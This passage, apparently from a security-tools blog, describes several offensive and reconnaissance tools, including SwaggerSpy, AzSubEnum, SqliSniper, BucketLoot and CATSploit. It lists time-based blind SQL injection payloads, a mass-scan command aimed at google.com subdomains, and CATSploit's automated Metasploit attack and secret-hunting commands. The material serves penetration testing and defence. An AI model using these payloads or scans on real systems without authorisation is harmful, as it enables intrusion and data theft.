    • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
    • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
    • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
    • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

    [13th January 2024] - Initial Release
    • Initial release of SploitScan.

    Contributing

    Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


    Author

    Alexander Hagenah - URL - Twitter



    SwaggerSpy - Automated OSINT On SwaggerHub

    By: Zion3R


    SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


    What is Swagger?

    Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


    About SwaggerHub

    SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


    Why OSINT on SwaggerHub?

    Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

    1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

    2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

    3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

    4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

    5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

    6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

    By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


    How SwaggerSpy Works

    SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
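
For a feel of that approach, the sketch below runs a few illustrative secret-hunting regexes over a fetched document; these patterns are simplified stand-ins, not SwaggerSpy's actual rule set:

import re

# Illustrative patterns only; real-world secret regexes are far more extensive.
PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Bearer token": re.compile(r"Bearer\s+[A-Za-z0-9\-_.=]+"),
    "Generic api_key": re.compile(r"api[_-]?key\"?\s*[:=]\s*\"[^\"]+\"", re.I),
}

def find_secrets(document_text):
    """Yield (label, match) pairs for every pattern hit in one API document."""
    for label, pattern in PATTERNS.items():
        for match in pattern.findall(document_text):
            yield label, match

for hit in find_secrets('{"api_key": "s3cr3t", "note": "AKIAABCDEFGHIJKLMNOP"}'):
    print(hit)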


    Getting Started

    To use SwaggerSpy, follow these steps:

    1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
    git clone https://github.com/UndeadSec/SwaggerSpy.git
    cd SwaggerSpy
    pip install -r requirements.txt
    1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
    python swaggerspy.py searchterm
    1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

    Disclaimer

    SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


    Contribution

    Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


    About the Author

    SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

    I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


    TODO

    Regular Expressions Enhancement
    • [ ] Review and improve existing regular expressions.
    • [ ] Ensure that regular expressions adhere to best practices.
    • [ ] Check for any potential optimizations in the regex patterns.
    • [ ] Test regular expressions with various input scenarios for accuracy.
    • [ ] Document any complex or non-trivial regex patterns for better understanding.
    • [ ] Explore opportunities to modularize or break down complex patterns.
    • [ ] Verify the regular expressions against the latest specifications or requirements.
    • [ ] Update documentation to reflect any changes made to the regular expressions.

    License

    SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


    Thanks

    Special thanks to @Liodeus for providing project inspiration through swaggerHole.



    AzSubEnum - Azure Service Subdomain Enumeration

    By: Zion3R


    AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


    How it works?

    AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

    With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
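    The general approach can be illustrated with a short, self-contained Python sketch. This is not AzSubEnum's exact logic; the service suffixes and the permutation scheme below are simplified assumptions.

    import socket

    # Subset of well-known Azure service domains, for illustration only.
    SUFFIXES = [
        "azurewebsites.net",      # App Services
        "blob.core.windows.net",  # Storage Accounts
        "database.windows.net",   # MSSQL
        "vault.azure.net",        # Key Vaults
    ]

    def enumerate_subdomains(base, words):
        """Resolve base-name permutations against Azure service suffixes."""
        candidates = [base] + [f"{base}-{w}" for w in words] + [f"{w}{base}" for w in words]
        found = []
        for name in candidates:
            for suffix in SUFFIXES:
                fqdn = f"{name}.{suffix}"
                try:
                    socket.gethostbyname(fqdn)  # successful resolution means the subdomain exists
                    found.append(fqdn)
                except socket.gaierror:
                    pass
        return found

    print(enumerate_subdomains("retailcorp", ["dev", "prod", "test"]))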


    Why did I create this?

    During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool Invoke-EnumerateAzureSubDomains from NetSPI was unable to run on PowerShell on my Debian system. Consequently, I created a crude implementation of that tool in Python.


    Usage
    โžœ  AzSubEnum git:(main) โœ— python3 azsubenum.py --help
    usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

    Azure Subdomain Enumeration

    options:
    -h, --help show this help message and exit
    -b BASE, --base BASE Base name to use
    -v, --verbose Show verbose output
    -t THREADS, --threads THREADS
    Number of threads for concurrent execution
    -p PERMUTATIONS, --permutations PERMUTATIONS
    File containing permutations

    Basic enumeration:

    python3 azsubenum.py -b retailcorp --threads 10

    Using permutation wordlists:

    python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt

    With verbose output:

    python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose




    SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

    By: Zion3R


    SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives through response-time analysis and to send alerts upon detection via its built-in Discord notification functionality.


    Key Features

    • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
    • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
    • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
    • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
    • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

    Installation

    git clone https://github.com/danialhalo/SqliSniper.git
    cd SqliSniper
    chmod +x sqlisniper.py
    pip3 install -r requirements.txt

    Usage

    This will display help for the tool. Here are all the options it supports.

    ubuntu:~/sqlisniper$ ./sqlisniper.py -h


    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
    โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–„โ–„ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ–€โ–€โ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•šโ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•

    -: By Muhammad Danial :-

    usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
    [--threads THREADS]

    Detect SQL injection by sending malicious queries

    options:
    -h, --help show this help message and exit
    -u URL, --url URL Single URL for the target
    -r URLS_FILE, --urls_file URLS_FILE
    File containing a list of URLs
    -p, --pipeline Read from pipeline
    --proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
    --payload PAYLOAD File containing malicious payloads (default is payloads.txt)
    --single-payload SINGLE_PAYLOAD
    Single payload for testing
    --discord DISCORD Discord Webhook URL
    --headers HEADERS File containing headers (default is headers.txt)
    --threads THREADS Number of threads

    Running SqliSniper

    Single URL Scan

    The URL can be provided with the -u flag for a single-site scan

    ./sqlisniper.py -u http://example.com

    File Input

    The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

    ./sqlisniper.py -r url.txt

    Piping URLs

    SqliSniper can also work with piped input using the -p flag

    cat url.txt | ./sqlisniper.py -p

    The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

    subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

    Scanning with custom payloads

    By default, SqliSniper uses the payloads.txt file. However, the --payload flag can be used to provide a custom payloads file.

    ./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

    While using a custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives (a simplified illustration follows the listing below). The payloads file should look like this:

    ubuntu:~/sqlisniper$ cat payloads.txt 
    0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
    "0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
    0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
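    To illustrate the mechanism (a simplified sketch, not SqliSniper's actual code), the scanner substitutes a concrete delay for %__TIME_OUT__%, injects the payload into a header, and compares the response time against a baseline:

    import time
    import requests

    def looks_time_based(url, header, payload, delay=5):
        """Inject a payload into one header and compare response times (illustrative)."""
        injected = payload.replace("%__TIME_OUT__%", str(delay))
        start = time.monotonic()
        requests.get(url, timeout=30)                               # baseline request
        baseline = time.monotonic() - start
        start = time.monotonic()
        requests.get(url, headers={header: injected}, timeout=30)   # injected request
        elapsed = time.monotonic() - start
        # A response slower by roughly the injected sleep time suggests injection.
        return elapsed - baseline >= delay * 0.8

    payload = "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
    print(looks_time_based("http://example.com", "User-Agent", payload))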

    Scanning with Single Payloads

    If you want to test with only a single payload, the --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%.

    ./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

    Scanning Custom Headers

    Headers are read from the headers.txt file. To scan custom headers, save the custom HTTP request headers in the headers.txt file.

    ubuntu:~/sqlisniper$ cat headers.txt 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    X-Forwarded-For: 127.0.0.1

    Sending Discord Alert Notifications

    SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

    ./sqlisniper.py -r url.txt --discord <web_hookurl>

    Multi-Threading

    Threads can be defined with the --threads flag

     ./sqlisniper.py -r url.txt --threads 10

    Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooked valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.


    SqliSniper is made in Python with lots of <3 by @Muhammad Danial.



    Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

    By: Zion3R


    Tool for analyzing SAP Secure Network Communications (SNC).

    How to use?

    In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.


    SAP Router

    SAP Routers can either support SNC or not; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out whether it is activated:

    sncscan -H 10.3.161.4 -S 3299 -p router

    DIAG / SAP GUI

    The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan and that impact the connection's security can be found in the Background section.

    sncscan -H 10.3.161.3 -S 3200 -p diag

    Multiple targets can be scanned with one command:

    sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206 

    Through SAP Router

    sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag

    Install

    Requirements: Currently, sncscan only works with the pysap library from our fork.

    python3 -m pip install -r requirements.txt

    or

    python3 setup.py test
    python3 setup.py install

    Background: SNC system parameters

    SNC Basics

    SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure authentication, integrity, and encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection that can be applied to an SNC-secured connection:

    1. Authentication only: Verifies the identity of the communication partners
    2. Integrity protection: Protection against manipulation of the data
    3. Confidentiality protection: Encrypts the transmitted messages

    SNC Parameter

    Each SAP system can be configured with SNC parameters for communication security. The security level of an SNC connection is determined by the Quality of Protection parameters:

    • snc/data_protection/min: minimum security level required for SNC connections
    • snc/data_protection/max: highest security level, initiated by the SAP system
    • snc/data_protection/use: default security level, initiated by the SAP system

    Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
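    For orientation, a hypothetical SAP profile excerpt could look as follows; the numeric values follow SAP's usual Quality of Protection convention (1 = authentication only, 2 = integrity, 3 = confidentiality):

    snc/data_protection/min = 2
    snc/data_protection/max = 3
    snc/data_protection/use = 3
    snc/only_encrypted_gui = 1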

    Reading out SNC Parameters

    As long as an SAP system that is capable of sending SNC messages is addressed, it responds to valid SNC requests regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system places on the SNC connection, which can then be used to obtain the SNC parameters. This makes it possible to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.



    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
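    The guest-mode listing can be approximated in a few lines of Python. This is a simplified sketch of parsing an S3-style XML listing, not BucketLoot's actual code, and the bucket URL is a placeholder.

    import urllib.request
    import xml.etree.ElementTree as ET

    def list_bucket_keys(bucket_url):
        """Fetch an S3-style XML listing and return object keys (max 1000 unauthenticated)."""
        with urllib.request.urlopen(bucket_url) as resp:
            tree = ET.fromstring(resp.read())
        # S3 listing XML exposes one namespaced <Contents><Key> element per object.
        ns = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}
        return [key.text for key in tree.findall(".//s3:Contents/s3:Key", ns)]

    # Hypothetical public bucket URL, for illustration only.
    for key in list_bucket_keys("https://example-bucket.s3.amazonaws.com/"):
        print(key)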

    Features

    Secret Scanning

    Scans for 80+ unique RegEx signatures that can help in uncovering secret exposures, tagged with their severity, from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a list of 80+ unique RegEx signatures in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and lets the tool scrape URLs from the response body for scanning.
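    Conceptually, Dig Mode boils down to scraping bucket-looking URLs out of a page body. A minimal sketch follows; the hostname patterns are illustrative, not BucketLoot's actual signature set.

    import re
    import urllib.request

    # Matches URLs pointing at common S3-compatible storage hosts (illustrative subset).
    BUCKET_HINT = re.compile(
        r"https?://[\w.-]*(?:s3[\w.-]*\.amazonaws\.com|storage\.googleapis\.com|digitaloceanspaces\.com)/[\w./-]*",
        re.IGNORECASE,
    )

    def dig(url):
        """Scrape a page body for bucket-looking URLs."""
        with urllib.request.urlopen(url) as resp:
            body = resp.read().decode("utf-8", errors="replace")
        return set(BUCKET_HINT.findall(body))

    print(dig("https://example.com"))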

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains, and domains that could be present in an exposed storage bucket, giving you a chance to discover hidden endpoints and an edge over traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

    By: Zion3R


    Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


    What is Mobb?

    Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

    What does Bugsy do?

    Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

    Scan

    • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
    • Analyzes the vulnerability report to identify issues that can be remediated automatically
    • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

    Analyze

    • Analyzes a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
    • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

    Disclaimer

    This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code; it uses findings detected by the SAST tools mentioned above.

    Usage

    You can simply run Bugsy from the command line, using npx:

    npx mobbdev


    CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

    By: Zion3R


    CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Traditionally, pentesters implicitly select the attack techniques suitable for the target systems. CATSploit uses system configuration information such as OS, open ports, and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the techniques with the highest scores, it is possible to choose the most appropriate attack technique for the target system without the "hack knack" (professional pentester's skill).

    CATSploit automatically performs penetration tests in the following sequence:

    1. Information gathering and prior information input: First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for information gathering, and also accepts prior information about the target systems if you have any.

    2. Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, the evaluation values for capture (eVc) and detectability (eVd) of each attack technique are calculated, per target computer.

    3. Selection of attack techniques by score and creation of the attack scenario: Attack techniques are selected and attack scenarios are created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) are selected (a simplified selection sketch follows this list).

    4. Execution of the attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase, using Metasploit as a framework and the Metasploit API to execute actual attacks.
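    As a simplified illustration of the scoring-based selection (not the actual CATS formulas), the records below mirror the eVc/eVd values later shown by scenario list:

    # Illustrative scenario records, mirroring the eVc/eVd scores of 'scenario list'.
    scenarios = [
        {"id": "rmgrof", "eVc": 100.0, "eVd": 32.0},
        {"id": "joglhf", "eVc": 70.0, "eVd": 60.0},
        {"id": "8jos4z", "eVc": 0.7, "eVd": 72.8},
    ]

    def pick(scenarios, policy):
        """Select a scenario according to a simple pre-defined policy."""
        if policy == "stealth":  # prioritize hard-to-detect: lowest eVd wins
            return min(scenarios, key=lambda s: s["eVd"])
        if policy == "capture":  # prioritize likelihood of capture: highest eVc wins
            return max(scenarios, key=lambda s: s["eVc"])
        raise ValueError(policy)

    print(pick(scenarios, "stealth")["id"])  # -> rmgrof
    print(pick(scenarios, "capture")["id"])  # -> rmgrof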


    Prerequisites

    CATSploit has the following prerequisites:

    • Kali Linux 2023.2a

    Installation

    Metasploit, Nmap and OpenVAS are assumed to be installed as part of the Kali distribution.

    Installing CATSploit

    To install the latest version of CATSploit, please use the following commands:

    Cloning and setup
    $ git clone https://github.com/catsploit/catsploit.git
    $ cd catsploit
    $ git clone https://github.com/catsploit/cats-helper.git
    $ sudo ./setup.sh

    Editing configuration file

    CATSploit uses a server-client architecture, and the server reads its JSON configuration file at startup. In config.json, the following fields should be modified for your environment (a hypothetical skeleton is shown after the list).

    • DBMS
      • dbname: database name created for CATSploit
      • user: username of PostgreSQL
      • password: password of PostgreSQL
      • host: If you are using a database on a remote host, specify the IP address of the host
    • SCENARIO
      • generator.maxscenarios: Maximum number of scenarios to calculate (*)
    • ATTACKPF
      • msfpassword: password of MSFRPCD
      • openvas.user: username of OpenVAS
      • openvas.password: password of OpenVAS
      • openvas.maxhosts: Maximum number of hosts to be tested at the same time (*)
      • openvas.maxchecks: Maximum number of test items to be tested at the same time (*)
    • ATTACKDB
      • attack_db_dir: Path to the folder where AttackSteps are stored

    (*) Adjust the number according to the specs of your machine.
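    A hypothetical config.json skeleton matching the fields above is shown below; the exact key layout (flat dotted keys versus nested objects) may differ, so check the file shipped with CATSploit.

    {
      "DBMS": {
        "dbname": "catsploit",
        "user": "postgres",
        "password": "changeme",
        "host": "127.0.0.1"
      },
      "SCENARIO": {
        "generator.maxscenarios": 30
      },
      "ATTACKPF": {
        "msfpassword": "changeme",
        "openvas.user": "admin",
        "openvas.password": "changeme",
        "openvas.maxhosts": 5,
        "openvas.maxchecks": 5
      },
      "ATTACKDB": {
        "attack_db_dir": "/path/to/attacksteps"
      }
    }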

    Usage

    To start the server, execute the following command:

    $ python cats_server.py -c [CONFIG_FILE]

    Next, prepare another console, start the client program, and initiate a connection to the server.

    $ python catsploit.py -s [SOCKET_PATH]

    After successfully connecting to the server and initializing it, the session will start.

       _________  ___________       __      _ __
    / ____/ |/_ __/ ___/____ / /___ (_) /_
    / / / /| | / / \__ \/ __ \/ / __ \/ / __/
    / /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
    \____/_/ |_/_/ /____/ .___/_/\____/_/\__/
    /_/

    [*] Connecting to cats-server
    [*] Done.
    [*] Initializing server
    [*] Done.
    catsploit>

    The client can execute a variety of commands. Each command can be executed with the -h option to display the format of its arguments.

    usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

    positional arguments:
    {host,scenario,scan,plan,attack,post,reset,help,exit}

    options:
    -h, --help show this help message and exit

    I've posted the commands and options below as well for reference.

    host list:
    show information about the hosts
    usage: host list [-h]
    options:
    -h, --help show this help message and exit

    host detail:
    show more information about one host
    usage: host detail [-h] host_id
    positional arguments:
    host_id ID of the host for which you want to show information
    options:
    -h, --help show this help message and exit

    scenario list:
    show information about the scenarios
    usage: scenario list [-h]
    options:
    -h, --help show this help message and exit

    scenario detail:
    show more information about one scenario
    usage: scenario detail [-h] scenario_id
    positional arguments:
    scenario_id ID of the scenario for which you want to show information
    options:
    -h, --help show this help message and exit

    scan:
    run network-scan and security-scan
    usage: scan [-h] [--port PORT] target_host [target_host ...]
    positional arguments:
    target_host IP address to be scanned
    options:
    -h, --help show this help message and exit
    --port PORT ports to be scanned

    plan:
    planning attack scenarios
    usage: plan [-h] src_host_id dst_host_id
    positional arguments:
    src_host_id originating host
    dst_host_id target host
    options:
    -h, --help show this help message and exit

    attack:
    execute attack scenario
    usage: attack [-h] scenario_id
    positional arguments:
    scenario_id ID of the scenario you want to execute

    options:
    -h, --help show this help message and exit

    post find-secret:
    find confidential information files that can be performed on the pwned host
    usage: post find-secret [-h] host_id
    positional arguments:
    host_id ID of the host for which you want to find confidential information
    options:
    -h, --help show this help message and exit

    reset:
    reset data on the server
    usage: reset [-h] {system} ...
    positional arguments:
    {system} reset system
    options:
    -h, --help show this help message and exit

    exit:
    exit CATSploit
    usage: exit [-h]
    options:
    -h, --help show this help message and exit

    Examples

    In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

    catsploit> scan 192.168.0.0/24
    Network Scanning ... 100%
    [*] Total 2 hosts were discovered.
    Vulnerability Scanning ... 100%
    [*] Total 14 vulnerabilities were discovered.
    catsploit> host list
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”“
